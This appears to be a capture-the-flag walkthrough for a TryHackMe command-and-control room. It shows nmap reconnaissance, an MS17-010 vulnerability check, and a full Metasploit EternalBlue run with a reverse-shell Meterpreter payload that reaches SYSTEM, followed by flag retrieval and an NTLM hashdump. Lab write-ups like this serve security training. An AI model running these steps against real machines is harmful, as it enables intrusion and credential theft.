██╗███╗   ██╗████████╗██████╗  ██████╗     ████████╗ ██████╗      ██████╗██████╗ 
██║████╗  ██║╚══██╔══╝██╔══██╗██╔═══██╗    ╚══██╔══╝██╔═══██╗    ██╔════╝╚════██╗
██║██╔██╗ ██║   ██║   ██████╔╝██║   ██║       ██║   ██║   ██║    ██║      █████╔╝
██║██║╚██╗██║   ██║   ██╔══██╗██║   ██║       ██║   ██║   ██║    ██║     ██╔═══╝ 
██║██║ ╚████║   ██║   ██║  ██║╚██████╔╝       ██║   ╚██████╔╝    ╚██████╗███████╗
╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝ ╚═════╝        ╚═╝    ╚═════╝      ╚═════╝╚══════╝
                https://tryhackme.com/room/introtoc2#
                
                
 _____          _       __   
/__   \__ _ ___| | __  / /_  
  / /\/ _` / __| |/ / | '_ \ 
 / / | (_| \__ \   <  | (_) |
 \/   \__,_|___/_|\_\  \___/ 
 
Command, Control, and Conquer


----Instead of using Armitage, I will be using Metasploit.
----(Armitage is the same thing, but with a GUI)

Nmap scan:

nmap -sV -T4 10.10.58.17
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-14 19:01 UTC
Nmap scan report for 10.10.58.17
Host is up (0.20s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: TEDS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows


----The room tells us we will be using Eternal Blue to exploit this, but if you want to see how you would confirm that it's vulnerable:

nmap -p 139,445 --script smb-vuln* 10.10.58.17
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-14 19:07 UTC
Nmap scan report for 10.10.58.17
Host is up (0.31s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds

----Next, start Metasploit:

msfconsole

----And search for the exploit:

msf6 > search eternal blue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


----The first one (#0) is the one we will be using.
----After we make our selection, there are a few options we need to set, which are RHOST (the victim machine) and LHOST (our machine, using the tun0 address)

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.113       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.58.17
RHOSTS => 10.10.58.17
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.2.125.93
LHOST => 10.2.125.93
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

----It is common for this exploit to fail a few times before finally getting it. It happens.

[*] Started reverse TCP handler on 10.2.125.93:4444 
[*] 10.10.58.17:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.58.17:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 10.10.58.17:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.58.17:445 - The target is vulnerable.
[*] 10.10.58.17:445 - Connecting to target for exploitation.
[+] 10.10.58.17:445 - Connection established for exploitation.
[+] 10.10.58.17:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.58.17:445 - CORE raw buffer dump (25 bytes)
[*] 10.10.58.17:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 10.10.58.17:445 - 0x00000010  61 73 69 63 20 37 36 30 30                       asic 7600       
[+] 10.10.58.17:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.58.17:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.58.17:445 - Sending all but last fragment of exploit packet
[*] 10.10.58.17:445 - Starting non-paged pool grooming
[+] 10.10.58.17:445 - Sending SMBv2 buffers
[+] 10.10.58.17:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.58.17:445 - Sending final SMBv2 buffers.
[*] 10.10.58.17:445 - Sending last fragment of exploit packet!
[*] 10.10.58.17:445 - Receiving response from exploit packet
[+] 10.10.58.17:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.58.17:445 - Sending egg to corrupted connection.
[*] 10.10.58.17:445 - Triggering free of corrupted buffer.
[-] 10.10.58.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.58.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.58.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.58.17:445 - Connecting to target for exploitation.
[+] 10.10.58.17:445 - Connection established for exploitation.
[+] 10.10.58.17:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.58.17:445 - CORE raw buffer dump (25 bytes)
[*] 10.10.58.17:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 10.10.58.17:445 - 0x00000010  61 73 69 63 20 37 36 30 30                       asic 7600       
[+] 10.10.58.17:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.58.17:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.58.17:445 - Sending all but last fragment of exploit packet
[*] 10.10.58.17:445 - Starting non-paged pool grooming
[+] 10.10.58.17:445 - Sending SMBv2 buffers
[+] 10.10.58.17:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.58.17:445 - Sending final SMBv2 buffers.
[*] 10.10.58.17:445 - Sending last fragment of exploit packet!
[*] 10.10.58.17:445 - Receiving response from exploit packet
[+] 10.10.58.17:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.58.17:445 - Sending egg to corrupted connection.
[*] 10.10.58.17:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.58.17
[*] Meterpreter session 1 opened (10.2.125.93:4444 -> 10.10.58.17:49193) at 2022-09-14 19:17:36 +0000
[+] 10.10.58.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.58.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.58.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

----We have successfully exploited the system. Drop into a shell with the command "shell".

----Administrator's flag can be found with: C:\Users\Administrator\Desktop>type root.txt
----And Ted's flag can be found with: C:\Users\Ted\Desktop>type user.txt

----Type "exit" to get back into a Meterpreter shell. Use the command "hashdump" to retrieve the NTLM hashes :) The hash is the one inbetween the last :'s
